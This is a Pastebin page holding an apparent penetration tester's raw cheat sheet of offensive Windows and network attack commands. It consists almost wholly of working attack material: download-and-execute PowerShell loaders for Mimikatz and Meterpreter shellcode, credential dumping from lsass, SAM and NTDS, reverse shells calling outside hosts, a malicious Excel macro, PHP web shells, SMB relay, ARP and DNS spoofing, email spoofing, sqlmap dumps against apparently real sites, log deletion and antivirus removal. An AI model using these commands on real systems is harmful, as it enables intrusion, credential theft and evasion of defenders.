Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
- powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
- powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Invoke-UserHunter
- powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Get-NetLocalGroup
- powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Invoke-EnumerateLocalAdmin
- powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Invoke-StealthUserHunter
- powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Find-LocalAdminAccess
- powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-NinjaCopy.ps1'); Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "c:\windows\temp\ntds.dit
- powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Invoke-FileFinder
- powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/PowerShell/BloodHound.ps1');
- BloodHound:
- powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/PowerShell/BloodHound.ps1');Invoke-Bloodhound -CSVFolder C:\Temp
- ---
- powershell_shell: IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); Get-Process lsass | Out-Minidump -DumpFilePath c:\temp
- meterpreter > download c:\\Windows\\Temp\\lsass_632.dmp
- python -m SimpleHTTPServer 9000
- sekurlsa::Minidump lsassdump.dmp
- sekurlsa::logonPasswords
- recon and finding other networks:
- fping 192.168.0.0/16 | grep -a "alive"
- ---
- powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1');
- powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.22.45:8080/')
- reg.exe save hklm\sam c:\temp\sam.save
- reg.exe save hklm\security c:\temp\security.save
- reg.exe save hklm\system c:\temp\system.save
- root@kali:~# nmap 190.57.29.177 -v -Pn -sT -A -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html"
- BDFproxy:
- veil option - #50
- echo 1 > /proc/sys/net/ipv4/ip_forward
- ./bdf_proxy.py
- iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
- iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080
- msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.22.75; set LPORT 4444; set exitonsession false; exploit -j"
- arpspoof -i eth0 -t target.ip router.ip
- arpspoof -i eth0 -t router.ip target.ip
- msfconsole -r bdfproxy_msf_resource.rc
- nmap -A -oG - 190.57.29.0/24 -p 445 --osscan-guess | grep -a "Windows Server"
- IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1"); Invoke-Inveigh -ConsoleOutput Y -NBNS Y -ConsoleStatus 1
- procdump -ma lsass.exe lsass.dmp
- powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1’); Get-NetUser -AdminCount | Select name,whencreated,pwdlastset,lastlogon
- ***
- sudo msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set LHOST 172.31.18.189; set LPORT 443; set exitonsession false; exploit -j"
- powershell -nop -windowstyle hidden -NonInteractive -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost aws.shellgam3.com -Lport 443"
- rubber ducky:
- java -jar duckencode.jar -i "reverse shell.txt"
- smbrelay:
- msfconsole -x "use exploit/multi/script/web_delivery; set target 2; set URIPATH /; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.22.62; set exitonsession false; exploit -j"
- ./responder.py -I eth0
- ./smbrelayx.py -h 192.168.22.151 -c "powershell -nop -exec bypass -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://192.168.22.119:8080/')"
- "powershell -nop -exec bypass -w hidden -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
- pth-winexe -U gp-wks-conf2/Administrator%aad3b435b51404eeaad3b435b51404ee:6154da6030a803632a63b1a0e1a3aeb3 //192.168.22.46 cmd
- nbtscan -r 192.168.22.0/24
- fping -g -d 192.168.23.0/24 2>/dev/null | grep alive
- capture ntlm handshake (snarf + responder)
- crack password from handshake (john)
- password spray to find local admin (metasploit)
- establish shells with local admin boxes (metasploit)
- snarf + responder:
- nodejs snarf.js 192.168.22.62 -d 192.168.22.41
- john snarf.pot --rules=all --wordlist=/media/sf_Shared/wordlists/guidant.txt
- responder -I eth0
- find local admin (post exploit):
- use auxiliary/scanner/smb/smb_login
- set smbdomain <domain>
- set smbuser <username>
- set smbpass <password>
- set rhosts 0.0.0.0/24
- Shell:
- msfconsole: use exploit/windows/smb/psexec
- msfconsole: set payload windows/meterpreter/reverse_https
- run post/windows/gather/smart_hashdump
- dumping creds/hashes:
- run post/windows/gather/cachedump
- run post/windows/gather/smart_hashdump
- load mimikatz > wdigest
- cracking hashes:
- john --format=mscash2 --wordlist=/media/sf_Shared/wordlists/rockyou.txt --rules=all gp_hashes.txt
- john snarf.pot --rules=all --wordlist=/media/sf_Shared/wordlists/guidant.txt
- password spraying:
- http://www.blackhillsinfosec.com/?p=4989
- @FOR /F %s in (systems.txt) DO @net use \\%s\C$ /.\Administrator
- AdminPass 1>NUL 2>&1 && @echo %s>>admin_access.txt && @net use
- /delete \\%s\C$ > NUL
- rpcclient:
- http://carnal0wnage.attackresearch.com/2010/06/more-with-rpcclient.html
- find local DC first, then ->
- rpcclient -U "" -N <ip addr of DC>
- commands: ?
- xfreerdp /u:jwelkley /p:GoBears1 /d:gp /v:192.168.2.60 /sec:rdp
- metasploit basics:
- gain access
- getuid
- getpid
- sysinfo
- run PS
- migrate process
- Reverse Meterpreter Shell:
- ubuntu@ip-172-31-18-189:/opt/metasploit-framework$ ./msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set LHOST 172.31.18.189; set PORT 8443; run"
- powershell -nop -windowstyle hidden -NonInteractive -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost aws.shellgam3.com -Lport 8443"
- Dump wireless PSKs:
- (netsh wlan show profiles) | Select-String “\:(.+)$” | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=”$name” key=clear)} | Select-String “Key Content\W+\:(.+)$” | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
- DNS subdomain enumeration:
- dnsrecon -d wabt.com -D /media/sf_Shared/wordlists/SecLists/Discovery/DNS/deepmagic.com_top50kprefixes.txt -t brt -f -n 8.8.8.8 --iw | grep -v 123.123.123.123
- ./proxychains4 nmap -p 53 -v -Pn -sS 8.8.8.8 -e eth0
- snarf + responder:
- nodejs snarf.js 192.168.22.62 -d 192.168.22.41
- john snarf.pot --rules=all --wordlist=/media/sf_Shared/wordlists/guidant.txt
- responder -I eth0
- MiTM:
- netstat -nr
- echo 1 > /proc/sys/net/ipv4/ip_forward
- arpspoof -i eth0 -t target.ip router.ip
- arpspoof -i eth0 -t router.ip target.ip
- MiTM via mitmf:
- mitmf -i eth0 --arp --spoof --hsts --gateway=10.0.0.1 --target=192.168.0.1
- Beef:
- ./beef
- mitmf -i eth0 --arp --spoof --hsts --gateway=192.168.0.1 --target=192.168.0.2 --inject --js-url http://192.168.0.5:300/hook.js
- DNS subdomain brute forcing:
- dnsrecon -d wpcu.coop -D /media/sf_Shared/wordlists/SecLists/Discovery/DNS/deepmagic.com_top50kprefixes.txt -t brt -f -n 8.8.8.8 --iw | grep -v 123.123.123.123
- Certificate injection:
- mitm +
- mitmproxy -T --host
- PtH with Metasploit:
- Kali: 173.18.131.94
- Victim: 173.18.131.111
- root@kali:/usr/bin# ./msfconsole
- msf > use exploit/windows/smb/psexec
- msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
- payload => windows/meterpreter/reverse_tcp
- msf exploit(psexec) > set lhost 173.18.131.94
- lhost => 173.18.131.94
- msf exploit(psexec) > set rhost 173.18.131.111
- rhost => 173.18.131.111
- msf exploit(psexec) > set smbpass 00000000000000000000000000000000:b048b97d9fdb66d3d2ed72b3782847a4
- smbpass => 00000000000000000000000000000000:b048b97d9fdb66d3d2ed72b3782847a4
- msf exploit(psexec) > set smbuser administrator
- smbuser => administrator
- msf exploit(psexec) > set smbdomain test
- smbdomain => test
- msf exploit(psexec) > exploit
- smb relay attack:
- Metasploit box: 172.17.130.81
- Domain Admin Workstation: 172.17.130.33
- Target Server: 172.17.130.75
- msfconsole -x “use windows/smb/smb_relay; set payload windows/meterpreter/reverse_tcp; set LHOST 172.17.130.81;set SMBHOST 172.17.130.75; set SRVHOST 172.17.130.81; run”
- -embed in email message:
- <html>
- <head>
- <img src=”\\172.17.130.81\test.jpg”></img>
- </head>
- </html>
- spoofing email via telnet:
- root@kali:~# telnet mx1.mail.icloud.com 25
- Trying 17.158.8.67…
- Connected to mx1.mail.icloud.com.
- Escape character is ‘^]’.
- 220 nk11p00mm-smtpin001.mac.com — Server ESMTP (Oracle Communications Messaging Server 7.0.5.36.0 64bit (built Sep 8 2015))
- helo whatever.com
- 250 nk11p00mm-smtpin001.mac.com OK, 50-197-245-29-static.hfc.comcastbusiness.net [XX.197.XXX.29].
- mail from:bob@icloud.com
- 250 2.5.0 Address Ok.
- rcpt to:nickvangilder@icloud.com
- 250 2.1.5 nickvangilder@icloud.com OK.
- data
- 354 Enter mail, end with a single “.”.
- To:Nick VanGilder<nickvangilder@icloud.com>
- From:Bob Dole<bob@icloud.com>
- Reply-To:Bob Dole<nickvangilder@outlook.com>
- Subject:Test
- This is a test
- .
- 250 2.5.0 Ok.
- check public ip address:
- proxychains curl ipecho.net/plain
- powershell
- import-module activedirectory
- get-aduser -filter {PasswordNeverExpires -eq $True -AND Enabled -eq $True} -properties PasswordLastSet | Sort PasswordLastSet | Select Distinguishedname,PasswordLastSet
- on linux box: nc -lvp 8443
- powershell ->
- $client = New-Object System.Net.Sockets.TCPClient("aws.shellgam3.com",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
- powershell -nop -exec bypass -file payload.ps1
- one-liner:
- powershell -Command "& {$client = New-Object System.Net.Sockets.TCPClient('192.168.22.63',8443);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}"
- To enumerate all domain controllers:
- nltest /dclist:domain.local
- Enumerate local admins:
- net localgroup Administrators
- Get-ADDefaultDomainPasswordPolicy
- net group "domain admins" /domain
- Fetch a file via HTTP (wget in PowerShell): PS C:\> (New-Object System.Net.WebClient).DownloadFile("http ://10.10.10.10/nc.exe","nc.exe")
- wmic computersystem get model,name,manufacturer,systemtype
- File injection:
- MiTM +
- iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
- ./mitmproxy -T -s “iframe_injector.py http://www.website.com/files/malicious_file.xlsm;
- cmdkey.exe /add:MACHINE_NAME_HERE /user:MACHINE_NAME_HERE\Administrator /pass:PASSWORD_HERE
- cmdkey.exe /delete:MACHINE_NAME_HERE
- https://download.sysinternals.com/files/PSTools.zip
- copy file to target
- psexec \\target -u username -p password cmd.exe
- start c:\path\payload.vbs
- Enable RDP:
- reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- Disable RDP:
- reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
- web app recon and scanning:
- proxychains, proxychains4, torify, tor-resolve
- service tor start
- service tor status
- dont forget to modify /etc/resolv.conf = 127.0.0.1
- protect against accidental discolsure = sudo iptables -A OUTPUT --dest <target> -j DROP
- proxychains nmap -v -sN -n 207.223.121.128 -PN
- nmap ip.adddress -v -Pn -sT
- nmap -Sv -T4 hostname.com
- dirb https://www.example.com
- grabber --url www.site.com --spider 1 --sql
- uniscan -d -u test.com
- /usr/share/zaproxy# java -DsocksProxyHost=127.0.0.1 -DsocksProxyPort=9050 -jar zap-2.4.1.jar
- nikto -h http://www.site.com
- whatweb test.com
- w3af_console
- wpscan
- sqlmap --tor --tor-type=SOCKS5 --check-tor --random-agent --risk=3 --level=5 --threads=10 --dbs --dump -D Database_name -T table_name -u http://xxxxx.com/board/board.php?id=6
- sqlmap --tor --tor-type=SOCKS5 --check-tor --random-agent --dbs --threads=10 --crawl=2 --risk=3 --level=5 --dump -u http://host.com/board.php?id=6
- sqlmap --tor --tor-type=SOCKS5 --check-tor --random-agent --dbs --dump -u https://test.com --sql-shell
- sqlmap --tor --tor-type=socks5 --check-tor --random-agent --keep-alive --forms --crawl=2 --risk=3 --threads=4 --batch -f --dbs -u https://review.logicforce.com
- sqlmap --random-agent --keep-alive --level=5 --forms --crawl=2 --risk=3 --threads=10 --batch -f --dump --dbs -u https://xxxxxxx.com
- sqlmap --random-agent --keep-alive --forms --crawl=2 --risk=3 --threads=10 --level=5 --batch -f --dbs -u http://human.firstcommunitymortgage.com/fha-loans/?gcf_captcha
- Look for HTTP PUT:
- curl -X OPTIONS -v http://200.x.x.x/test/
- UPLOAD FILE:
- curl --upload-file /root/Desktop/reverse_shell.php -v --url http://172.17.130.93/test/rshell.php -0 --http1.0
- curl -i -X PUT -H "Content-Type: application/xml; charset=utf-8" -d @"/tmp/some-file.xml" http://www.victim.com/newpage
- curl -X PUT -d "text or data to put" http://www.victim.com/destination_page
- curl -i -H "Accept: application/json" -X PUT -d "text or data to put" http://victim.com/new_page
- first put this into cmd.php:
- <?php echo system($_GET["cmd"]); ?>
- THEN, for shell access:
- this one worked:
- put this in filename.sh
- http://172.17.130.93/test/cmd.php?cmd=filename.sh
- $ exec 5<>/dev/tcp/evil.com/8080
- $ cat <&5 | while read line; do $line 2>&5 >&5; done
- Macro enabled xlsm:
- ubuntu@ip-172-31-18-189:/opt/metasploit-framework$ ./msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set LHOST 172.31.18.189; set PORT 8443; run"
- Private Sub Auto_Open()
- strCommand = "powershell -nop -windowstyle hidden -NonInteractive -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1 ');invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost 52.x.x.123 -Lport 8443"
- Set WshShell = CreateObject("WScript.Shell")
- Set WshShellExec = WshShell.Exec(strCommand)
- End Sub
- DNS Spoofing:
- #IP Forwarding
- echo 1 > /proc/sys/net/ipv4/ip_forward
- #DNS Port Redirection
- iptables -A INPUT -i eth0 -p udp --dport 53 -j ACCEPT
- iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53
- #ARP Cache Poisioning / MitM
- arpspoof -i eth0 -t victimIP routerIP
- arpspoof -i eth0 -t routerIP victimIP
- #DNS Spoofing
- dnschef -i 172.17.130.60 --fakeip=52.37.49.217 --fakedomains=test.com
- #172.17.130.60 = my internal Kali box
- #Fake IP = where you want to redirect to
- #Fake Domains = name of domain to redirect
- View your current user: whoami
- View information about the current user: net user myuser(for a local user)
- net user myuser /domain (for a domain user)
- View the local groups: net localgroup
- View the local administrators: net localgroup Administrators
- Add a new user: net user myuser mypass /add
- Add a user in the local Administrators group: net localgroup Administrators myuser /add
- View the domain name of current machine: net config workstation
- net config server
- View the name of the domain controller: reg query "HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\ CurrentVersion\Group Policy\ History" /v DCName
- View the list of domain admins: net group "Domain Admins" /domain
- View the list of started services (search for antivirus): net start
- sc query
- Stop a service: net stop "Symantec Endpoint Protection"
- View the list of started processes and the owner: tasklist /v
- Kill a process by its name taskkill /F /IM "cmd.exe"
- Abort a shutdown/restart countdown shutdown /a
- Create php backdoor/shell echo ^<?php echo passthru($_GET['cmd']); ?^> > C:\inetpub\wwwroot\s.php
- View established connections of current machine: netstat -a -n -p tcp | find "ESTAB"
- View open ports of current machine: netstat -a -n -p tcp | find "LISTEN"
- netstat -a -n -p udp
- View network configuration: netsh interface ip show addresses
- netsh interface ip show route
- netsh interface ip show neighbors
- View current network shares: net share
- Mount a remote share with the rights of the current user: net use K: \\10.1.2.3\C$
- dir K:
- Enable Remote Desktop: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- Blind Files
- %SYSTEMDRIVE%\boot.ini
- A file that can be counted on to be on virtually every windows host. Helps with confirmation that a read is happening.
- %WINDIR%\win.ini
- This is another file to look for if boot.ini isn’t there or coming back, which is some times the case.
- %SYSTEMROOT%\repair\SAM
- %SYSTEMROOT%\System32\config\RegBack\SAM
- It stores users' passwords in a hashed format (in LM hash and NTLM hash). The SAM file in \repair is locked, but can be retired using forensic or Volume Shadow copy methods
- %SYSTEMROOT%\repair\system
- %SYSTEMROOT%\System32\config\RegBack\system
- System
- whoami /all
- set
- fsutil fsinfo drives
- reg query HKLM /s /d /f "C:\* *.exe" | find /I "C:\" | find /V """"
- ipconfig /all
- ipconfig /displaydns
- netstat -nabo
- netstat -s -p [tcp|udp|icpm|ip]
- netstat -r
- netstat -na | findstr :445
- netstat -nao | findstr LISTENING
- netstat -nao | findstr LISTENING
- netstat -na | findstr LISTENING
- netsh diag show all
- net view
- net view /domain
- net view /domain:otherdomain
- net user %USERNAME% /domain
- net user /domain
- net accounts
- net accounts /domain
- net localgroup administrators
- net localgroup administrators /domain
- net group “Domain Admins” /domain
- net group “Enterprise Admins” /domain
- net group “Domain Controllers” /domain
- nbtstat -a [ip here]
- net share
- net session | find / “\\”
- arp -a
- route print
- browstat (Not working on XP)
- netsh wlan show profiles
- shows all saved wireless profiles. You may then export the info for those profiles with the command below
- netsh wlan export profile folder=. key=clear
- netsh wlan [start|stop] hostednetwork
- netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=persistent|temporary
- netsh wlan set hostednetwork mode=[allow|disallow]
- wmic ntdomain list Retrieve information about Domain and Domain Controller
- gpresult /z
- sc qc
- sc query
- sc queryex
- type %WINDIR%\System32\drivers\etc\hosts
- echo %COMSPEC%
- c:\windows\system32\gathernetworkinfo.vbs
- tree C:\ /f /a > C:\output_of_tree.txt
- dir /a
- dir /b /s [Directory or Filename]
- dir \ /s /b | find /I “searchstring”
- %WINDIR%\system32\config\AppEvent.Evt
- %WINDIR%\system32\config\SecEvent.Evt
- %WINDIR%\system32\config\default.sav
- %WINDIR%\system32\config\security.sav
- %WINDIR%\system32\config\software.sav
- %WINDIR%\system32\config\system.sav
- %WINDIR%\system32\CCM\logs\*.log
- %USERPROFILE%\ntuser.dat
- %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
- %WINDIR%\System32\drivers\etc\hosts
- unattend.txt, unattend.xml, sysprep.inf
- net share \\computername
- tasklist /V /S computername
- qwinsta /SERVER:computername
- qprocess /SERVER:computername *
- net use \\computername
- net use \\computername /user:DOMAIN\username password
- reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
- net time \\computername (Shows the time of target computer)
- dir \\computername\share_or_admin_share\ (dir list a remote directory)
- tasklist /V /S computername
- Lists tasks w/users running those tasks on a remote system. This will remove any IPC$ connection after it is done so if you are using another user, you need to re-initiate the IPC$ mount
- WMI
- wmic bios
- wmic qfe qfe get hotfixid
- wmic startupwmic service
- wmic process get caption,executablepath,commandline
- wmic process call create “process_name” (executes a program)
- wmic process where name=”process_name” call terminate (terminates program)
- wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber (hard drive information)
- wmic useraccount (usernames, sid, and various security related goodies)
- wmic useraccount get /ALL
- wmic share get /ALL (you can use ? for gets help ! )
- wmic startup list full (this can be a huge list!!!)
- wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about target)
- reg save HKLM\Security security.hive (Save security hive to a file)
- reg save HKLM\System system.hive (Save system hive to a file)
- reg save HKLM\SAM sam.hive (Save sam to a file)=
- reg add [\\TargetIPaddr\] [RegDomain][ \Key ]
- reg export [RegDomain]\[Key] [FileName]
- reg import [FileName ]
- reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can to add /s for recurse all values )
- Deleting Logs
- wevtutil el (list logs)
- wevtutil cl <LogName> (Clear specific lowbadming)
- del %WINDIR%\*.log /a /s /q /f
- Uninstalling Software “AntiVirus” (Non interactive)
- wmic product get name /value (this gets software names)
- wmic product where name="XXX" call uninstall /nointeractive (this uninstalls software)
- # Other (to be sorted)
- pkgmgr usefull /iu :”Package”
- pkgmgr usefull /iu :”TelnetServer” (Install Telnet Service ...)
- pkgmgr /iu:”TelnetClient” (Client )
- rundll32.exe user32.dll, LockWorkStation (locks the screen -invasive-)
- wscript.exe <script js/vbs>
- cscript.exe <script js/vbs/c#>
- Vista/7
- winstat features
- wbadmin get status
- wbadmin get items
- gpresult /H gpols.htm
- bcdedit /export <filename>
- #Disables the local windows firewall
- netsh firewall set opmode disable
- #Enables the local windows firewall. If rules are not in place for your connection, this could cause you to loose it.
- netsh firewall set opmode enable
- @FOR /F %n in (users.txt) DO @FOR /F %p in (password.txt) DO @net use \\192.168.200.1 /user:domain\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\192.168.200.1\IPC$ > NUL
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement